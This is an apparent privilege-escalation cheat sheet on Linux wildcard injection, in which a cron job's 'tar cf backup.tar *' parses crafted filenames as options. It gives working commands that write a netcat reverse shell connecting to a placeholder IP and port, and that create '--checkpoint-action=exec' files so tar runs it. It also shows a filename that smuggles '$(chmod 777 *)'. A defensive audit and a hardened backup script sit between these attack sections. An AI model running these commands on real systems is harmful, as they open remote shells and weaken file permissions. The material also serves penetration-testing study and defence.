# Wildcard usage
* [Leon Juranic has shown how wildcards can be exploited on Linux](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
## Another Example
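* A cron job backs up `/var/www/html` with `tar cf backup.tar *`. The shell expands `*` into the directory's filenames before tar starts, so a filename that begins with `--` is parsed by tar as an option. The reverse shell script and the tar parameters therefore need to exist as files in this directory to be picked up by tar and executed.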
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
```
or
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```
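
The defensive side of the cron job above, as an added example that is not part of the original page: it lists option-like filenames in a backup source and archives the directory without passing a wildcard expansion to tar. The function names, the `EXECUTED` marker and the sample directory are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a backup source for option-like filenames and
# archive it without handing a wildcard expansion to tar.

# Print every entry directly inside DIR whose name starts with "-".
# After `*` expands, tar would parse such names as command-line options.
list_option_like_names() {
    dir=$1
    for path in "$dir"/-*; do
        # An unmatched glob stays literal; skip it (dangling symlinks still count).
        [ -e "$path" ] || [ -L "$path" ] || continue
        printf '%s\n' "${path##*/}"
    done
}

# Weak:     cd "$src" && tar cf backup.tar *
# Hardened: no glob at all. tar is given the directory itself via -C, so
# filenames only ever reach tar as archive members, never as argv words.
# Write the archive outside the source directory.
safe_backup() {
    src=$1
    out=$2
    tar -cf "$out" -C "$src" .
}

# Constructed sample: a directory holding one normal file and two
# option-like names (the exec action would only create a marker file).
make_sample_dir() {
    d=$(mktemp -d) || return 1
    echo "hello" > "$d/index.html"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=touch EXECUTED"
    printf '%s\n' "$d"
}
```

Any output from `list_option_like_names` on a directory that other users can write to is worth alerting on before a privileged job processes it.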
## Touched Filename Options
* Give full permissions on all the files
```sh
touch './"";$(chmod 777 *)'
```